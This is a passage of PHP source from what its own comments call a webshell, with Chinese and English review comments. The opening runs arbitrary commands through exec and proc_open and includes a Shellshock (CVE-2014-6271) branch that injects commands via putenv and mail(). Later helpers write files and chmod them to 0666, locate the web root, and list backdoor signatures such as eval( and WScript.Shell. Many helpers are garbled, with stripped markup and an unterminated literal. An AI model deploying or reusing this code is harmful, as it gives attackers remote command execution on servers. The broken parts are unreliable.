exec($cmd);
$f = $e->StdOut();
$res = $f->ReadAll();
}
//
elseif (function_exists('proc_open')) {
$length = strcspn($cmd, " \t"); //返回 $cmd 中,所有字符都不存在于 ' \t' 范围的起始子字符串的长度
$token = substr($cmd, 0, $length); //截取$length长的$cmd作为$token
if (isset($aliases[$token])) {
$cmd = $aliases[$token] . substr($cmd, $length);
} //真正的cmd语句在这
//proc_open中,0 表示标准输入(stdin),1 表示标准输出(stdout),2 表示标准错误(stderr)
//这里用了1和2,比较完善
$p = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while (!feof($io[1])) {
//htmlspecialchars: 将特殊字符转换为 HTML 实体
//ENT_COMPAT(此处实际使用的标志): 会转换双引号,不转换单引号;ENT_QUOTES 则两者都转换。
$res .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$res .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
//bash破壳漏洞(CVE-2014-6271)
elseif (function_exists('mail')) {
if (strstr(readlink("/bin/sh"), "bash") != false) {
$tmp = tempnam(".", "data");
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
mail("a@127.0.0.1", "", "", "", "-bv");
} else {
$res = "Not vuln (not bash)";
}
//这里顺序有问题,下面这段应该放在上面那个if里
$output = @implode('', @file($tmp));
@unlink($tmp);
if ($output != "") {
$res = $output;
} else {
$res = "No output, or not vuln.";
}
}
return $res;
}
//webshell里图片的base64储存
// Serve one of the embedded file-type icons as a GIF and end the request.
//
// $img is used directly as an array key with no existence check: an unknown
// key produces an undefined-index notice and an empty image body.
// NOTE(review): these fixed base64 literals are a constant part of this file
// and may be usable as a static content signature when hunting for copies of
// it - confirm against other samples before relying on them.
function css_img($img)
{
    // Icon key => base64-encoded GIF bytes (decoded verbatim below).
    $icons = array(
        "exe" =>
            "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" .
            "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" .
            "xhIAOw==",
        "dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE" .
            "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
        "txt" =>
            "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ" .
            "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7" .
            "UpPWG3Ig6Hq/XmRjuZwkAAA7",
        "html" =>
            "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz" .
            "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P" .
            "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk" .
            "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR" .
            "ADs=",
        "js" =>
            "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH" .
            "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs" .
            "a00AjYYBbc/o9HjNniUAADs=",
        "xml" =>
            "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA" .
            "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx" .
            "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ" .
            "IQA7",
        "mp3" =>
            "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" .
            "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" .
            "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
        "img" =>
            "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci" .
            "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd" .
            "FxEAOw==",
        "title" => "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+" .
            "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL" .
            "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
        "rar" => "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/" .
            "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b" .
            "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC" .
            "aNOmRcjVj02tPxPCzfkvIAA7"
    );

    // The response is always labelled as a GIF, whichever key was requested.
    header('Content-type: image/gif');

    $gifBytes = base64_decode($icons[$img]);
    echo $gifBytes;

    // Stop here so nothing else gets appended after the image data.
    die();
}
//取文件后缀,返回文件类型
// Map a file name to an icon key by looking at its last three characters.
//
// The comparison is case-sensitive and works on the raw three-character tail,
// which is why entries such as "tml", ".js", ".rm" and ".gz" appear: they are
// the tails of ".html", ".js", ".rm" and ".gz". Any unrecognised tail yields
// 'txt'.
function css_showimg($file)
{
    // Tail => icon key; the keys returned here match those used by css_img().
    static $iconByTail = array(
        'jpg' => 'img',
        'gif' => 'img',
        'bmp' => 'img',
        'png' => 'img',
        'ico' => 'img',
        'htm' => 'html',
        'tml' => 'html',
        'exe' => 'exe',
        'com' => 'exe',
        'xml' => 'xml',
        'doc' => 'xml',
        '.js' => 'js',
        'vbs' => 'js',
        'mp3' => 'mp3',
        'wma' => 'mp3',
        'wav' => 'mp3',
        'swf' => 'mp3',
        '.rm' => 'mp3',
        'avi' => 'mp3',
        'mp4' => 'mp3',
        'mvb' => 'mp3',
        'rar' => 'rar',
        'tar' => 'rar',
        '.gz' => 'rar',
        'zip' => 'rar',
        'iso' => 'rar',
    );

    $tail = substr($file, -3);

    return isset($iconByTail[$tail]) ? $iconByTail[$tail] : 'txt';
}
//打印html到页面上
// Write $data to the response followed by a single line feed.
//
// The value is emitted verbatim: no HTML escaping is applied here, so any
// encoding has to be done by the caller.
function html_n($data)
{
    $line = $data . "\n";
    echo $line;
}
//木马特征检测: 按文件类型($filetype)在文件内容中查找常见后门特征字符串(不区分大小写),命中返回 true
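// Report whether file contents contain one of a few substrings commonly seen
// in script backdoors for the given script type.
//
// $filecode  File contents to inspect.
// $filetype  One of "php", "asp", "aspx", "jsp"; any other value matches nothing.
// Returns true on the first case-insensitive substring hit, false otherwise.
//
// This is plain substring matching: it flags legitimate code that calls these
// functions and misses anything obfuscated, so a hit is a triage hint only.
// NOTE(review): the "CreateText()" entry includes the closing parenthesis, so
// it only matches a call written with no arguments - confirm that is intended.
function muma($filecode, $filetype)
{
    $dim = array(
        "php" => array("eval(", "exec("),
        "asp" => array("WScript.Shell", "execute(", "createtextfile("),
        "aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"),
        "jsp" => array("runtime.exec(")
    );

    // An unknown type previously fed null to foreach and raised warnings.
    if (!isset($dim[$filetype])) {
        return false;
    }

    foreach ($dim[$filetype] as $code) {
        // Compare the offset with false explicitly instead of relying on the
        // truthiness of the matched substring.
        if (stripos($filecode, $code) !== false) {
            return true;
        }
    }

    // Explicit result instead of falling off the end with an implicit null.
    return false;
}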
//判断文件名中是否包含 $ftype(以 | 分隔)里的任一字符串;注意是子串匹配,并不只匹配后缀
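// Report whether $file contains any of the '|'-separated strings in $ftype.
//
// $file   File name (or path) to test.
// $ftype  Candidate strings joined with '|', e.g. "php|asp".
// Returns true on the first case-insensitive hit, false otherwise.
//
// The match is a substring test anywhere in $file, not an extension check:
// "php" also matches "php_notes.txt".
function debug($file, $ftype)
{
    $candidates = explode('|', $ftype);

    foreach ($candidates as $candidate) {
        // stristr() returns the matched tail of the string, and a tail of "0"
        // is falsy, so test the offset from stripos() against false instead.
        if (stripos($file, $candidate) !== false) {
            return true;
        }
    }

    // Explicit result instead of an implicit null when nothing matched.
    return false;
}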
//替换路径中的 // 为 /
// Collapse each "//" in $path to "/".
//
// The replacement is a single left-to-right pass, so a run of three slashes
// still leaves a double slash behind.
function str_path($path)
{
    $doubleSlash = '//';
    $singleSlash = '/';

    return str_replace($doubleSlash, $singleSlash, $path);
}
//弹窗
// Terminate the request with an empty output string.
//
// $msg is not referenced in the body as shown.
// NOTE(review): the empty literal suggests the markup that used $msg was lost
// when this listing was extracted - confirm against the original file.
function msg($msg)
{
    exit("");
}
//返回路径中的目录部分,替换\\为/,并进行url编码
// Return the URL-encoded parent directory of $nowpath.
//
// dirname() runs first; backslashes in its result are then turned into
// forward slashes before the whole string is passed through urlencode().
function uppath($nowpath)
{
    $parent = dirname($nowpath);
    $normalised = str_replace('\\', '/', $parent);

    return urlencode($normalised);
}
//输出带有target的a
// Print $name on its own line through html_n().
//
// $url is not referenced in the body as shown, and $name is written without
// any HTML escaping.
// NOTE(review): the anchor markup this helper is named for appears to have
// been stripped from the listing - confirm against the original file.
function html_ta($url, $name)
{
    $label = "{$name}";
    html_n($label);
}
//html的a
// Print $name followed by one space through html_n().
//
// $url and $where are not referenced in the body as shown, and $name is
// written without any HTML escaping.
// NOTE(review): the anchor markup appears to have been stripped from the
// listing - confirm against the original file.
function html_a($url, $name, $where = '')
{
    $label = "{$name} ";
    html_n($label);
}
//显示指定的url图片
// Print a string consisting of a single line break through html_n().
//
// $url is not referenced in the body as shown.
// NOTE(review): the image markup this helper is named for appears to have
// been stripped from the listing, leaving only the line break inside the
// literal - confirm against the original file.
function html_img($url)
{
html_n("
");
}
//返回
// Print an empty string (so, just the line feed html_n() appends).
//
// NOTE(review): the literal is empty in this listing; the original markup was
// presumably stripped during extraction - confirm against the original file.
function back()
{
    $markup = "";
    html_n($markup);
}
//html的radio
// Print two labels through html_n(): $namei first, then $namet followed by a
// line break.
//
// $v1 and $v2 are not referenced in the body as shown, and both labels are
// written without any HTML escaping.
// NOTE(review): the empty '' literals suggest the radio-button markup was
// stripped from the listing - confirm against the original file.
function html_radio($namei, $namet, $v1, $v2)
{
html_n('' . $namei);
html_n('' . $namet . '
');
}
//html的input
// Print $text through html_n(); when $mode is falsy a trailing space is added.
//
// $type, $name, $value and $size are not referenced in the body as shown, and
// $text is written without any HTML escaping.
// NOTE(review): the input-element markup appears to have been stripped from
// the listing - confirm against the original file.
function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false)
{
    $label = $mode ? "{$text}" : "{$text} ";
    html_n($label);
}
//html的textarea
// Print a string consisting of a single line break through html_n().
//
// None of $name, $cols, $rows or $value is referenced in the body as shown.
// NOTE(review): the textarea markup appears to have been stripped from the
// listing, leaving only the line break inside the literal - confirm against
// the original file.
function html_text($name, $cols, $rows, $value = '')
{
html_n("
");
}
//html的select
// Print an empty string (so, just the line feed html_n() appends).
//
// None of the parameters is referenced in the body as shown.
// NOTE(review): the select-element markup appears to have been stripped from
// the listing - confirm against the original file.
function html_select($array, $mode = '', $change = '', $name = 'class')
{
    $markup = "";
    html_n($markup);
}
//html的font
// Print $name on its own line through html_n().
//
// $color and $size are not referenced in the body as shown, and $name is
// written without any HTML escaping.
// NOTE(review): the font markup appears to have been stripped from the
// listing - confirm against the original file.
function html_font($color, $size, $name)
{
    $label = "{$name}";
    html_n($label);
}
//替换\\为/,替换//为/
// Normalise path separators: backslashes become "/", then each "//" becomes "/".
//
// Both replacements are single passes applied in that order, so longer runs
// of slashes are shortened but not necessarily reduced to one.
function File_Str($string)
{
    // With an array of search strings str_replace() applies them one after
    // another, which matches the original nested calls.
    return str_replace(array('\\', '//'), '/', $string);
}
//文件写入
// Write $filecode to $filename using fopen() mode $filemode.
//
// Returns true when a write reports a non-zero byte count, false otherwise.
// All filesystem errors are suppressed with @, so a failure is visible only
// through the return value.
//
// If the first write fails (or writes zero bytes, e.g. empty $filecode) the
// file is chmod-ed to 0666 - world-readable and world-writable - and the write
// is retried on the same handle. That permission change persists afterwards
// and is worth looking for when reviewing a host where this code has run.
function File_Write($filename, $filecode, $filemode)
{
    $fp = @fopen($filename, $filemode);
    $written = true;

    if (!@fwrite($fp, $filecode)) {
        @chmod($filename, 0666);
        $written = (bool) @fwrite($fp, $filecode);
    }

    @fclose($fp);

    return $written;
}
//返回www根目录
// Estimate the filesystem path of the web root.
//
// Takes the real path of the current working directory and cuts off as many
// trailing characters as the directory part of $_SERVER['PHP_SELF'] is long,
// then normalises separators with File_Str().
// NOTE(review): this presumes the URL path of the script mirrors the tail of
// its filesystem path; PHP_SELF is derived from the request, so the result is
// only as reliable as that value - confirm before relying on it.
function File_Mode()
{
    $workingDir = realpath('./');
    $scriptUrl = $_SERVER['PHP_SELF'];

    // Directory part of the script URL: everything before the last "/".
    $scriptUrlDir = substr($scriptUrl, 0, strrpos($scriptUrl, '/'));

    $rootLength = strlen($workingDir) - strlen($scriptUrlDir);

    return File_Str(substr($workingDir, 0, $rootLength));
}
//文件所属用户
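// Return the account name that owns $File, or null when it cannot be resolved.
//
// A ':' PATH_SEPARATOR is used as the test for a non-Windows host. null is
// returned on other hosts, when the posix extension is unavailable, when the
// owner id cannot be read, or when the id has no passwd entry.
function GetFileOwner($File)
{
    // Without posix_getpwuid() the original indexed the path string itself
    // with ['name'], which is an error rather than a lookup.
    if (PATH_SEPARATOR != ':' || !function_exists('posix_getpwuid')) {
        return null;
    }

    $uid = fileowner($File);
    if ($uid === false) {
        return null;
    }

    // posix_getpwuid() returns false for an id with no passwd entry.
    $entry = posix_getpwuid($uid);

    return (is_array($entry) && isset($entry['name'])) ? $entry['name'] : null;
}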
//文件所属组
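// Return the group name that owns $File, or null when it cannot be resolved.
//
// A ':' PATH_SEPARATOR is used as the test for a non-Windows host. null is
// returned on other hosts, when the posix extension is unavailable, when the
// group id cannot be read, or when the id has no group entry.
function GetFileGroup($File)
{
    // Without posix_getgrgid() the original indexed the path string itself
    // with ['name'], which is an error rather than a lookup.
    if (PATH_SEPARATOR != ':' || !function_exists('posix_getgrgid')) {
        return null;
    }

    $gid = filegroup($File);
    if ($gid === false) {
        return null;
    }

    // posix_getgrgid() returns false for an id with no group entry.
    $entry = posix_getgrgid($gid);

    return (is_array($entry) && isset($entry['name'])) ? $entry['name'] : null;
}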
//文件大小数字处理
// Format a byte count as a short human-readable string.
//
// Values below 1024 are returned unchanged with " B"; larger values are
// divided by the matching power of 1024, rounded to two decimals and suffixed
// with " K", " M", " G" or " T". Anything at or above 1024^5 is divided by
// 1024^5 and suffixed with " ST".
function File_Size($size)
{
    $step = 1024;

    if ($size < $step) {
        return $size . " B";
    }

    // $divisor walks through 1024^1 .. 1024^4; each suffix applies while the
    // size is still below the next power.
    $divisor = $step;
    foreach (array(" K", " M", " G", " T") as $suffix) {
        if ($size < $divisor * $step) {
            return round($size / $divisor, 2) . $suffix;
        }
        $divisor *= $step;
    }

    // $divisor is now 1024^5.
    return round($size / $divisor, 2) . " ST";
}
//读取文件
// Read the whole of $filename in binary mode and return its contents.
//
// The read length is whatever filesize() reports for the path. Every call is
// error-suppressed with @, so the function emits no warnings itself and the
// caller only sees whatever fread() returned.
function File_Read($filename)
{
    $fp = @fopen($filename, "rb");
    $byteCount = @filesize($filename);
    $contents = @fread($fp, $byteCount);
    @fclose($fp);

    return $contents;
}
//数组编码转换
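// Convert a string, or every key and value of a (nested) array, to $output.
//
// $data    String or array of strings/arrays.
// $output  Target encoding name handed to mb_convert_encoding().
// Returns the converted string, or a new array with converted keys and values.
//
// The source encoding of each string is guessed with mb_detect_encoding()
// from a fixed candidate list; when no candidate matches, the value is
// returned unchanged.
function array_iconv($data, $output = 'utf-8')
{
    if (is_array($data)) {
        // Build a fresh array so a re-encoded key replaces the old key
        // instead of being added next to it.
        $converted = array();
        foreach ($data as $key => $val) {
            // Recurse for every value: the original converted the whole
            // $data array here instead of the single element $val.
            $converted[array_iconv($key, $output)] = array_iconv($val, $output);
        }
        return $converted;
    }

    // Detection runs per string; handing an array to mb_detect_encoding(),
    // as the original did before its is_array() check, is a type error.
    $text = (string) $data;
    $encode_arr = array('UTF-8', 'ASCII', 'GBK', 'utf8', 'BIG5', 'JIS', 'eucjp-win', 'sjis-win', 'EUC-JP');
    $encoded = mb_detect_encoding($text, $encode_arr);
    if ($encoded === false) {
        return $data;
    }

    return mb_convert_encoding($text, $output, $encoded);
}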
//截断字符串: 长度不小于 $len 时,保留前 $len 个字节并追加 '...'
// Shorten $data for display: strings shorter than $len bytes are returned
// unchanged, anything else keeps its first $len bytes and gets "..." appended.
//
// Lengths are counted in bytes, and a string of exactly $len bytes also gets
// the "..." suffix.
function Mysql_Len($data, $len)
{
    $fitsAsIs = strlen($data) < $len;

    return $fitsAsIs ? $data : substr_replace($data, '...', $len);
}
//一些js,最后那些php unknown
function css_js($num, $code = '')
{
// NOTE(review): the html_n() argument below opens with a single quote and is
// followed by a double quote, so the literal is not terminated as shown; the
// script markup it carried appears to have been stripped from this listing.
// Neither $num nor $code is referenced in what remains - confirm against the
// original file.
html_n('");
}
//左侧CSS
function css_left()
{
$str = <<
.menu{width:152px;margin-left:auto;margin-right:auto;}
.menu dl{margin-top:2px;}
.menu dl dt{top left repeat-x;}
.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
.menu dl dt a:hover{color:#FFFFCC;}
.menu dl dd ul{list-style:none;}
.menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
border-style:solid;border-width:1px;}
.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
end;
html_n($str);
$str = <<
function getObject(objectId){
if(document.getElementById && document.getElementById(objectId)) {
return document.getElementById(objectId);
}
else if (document.all && document.all(objectId)) {
return document.all(objectId);
}
else if (document.layers && document.layers[objectId]) {
return document.layers[objectId];
}
else {
return false;
}
}
function showHide(objname){
var obj = getObject(objname);
if(obj.style.display == "none"){
obj.style.display = "block";
}else{
obj.style.display = "none";
}
}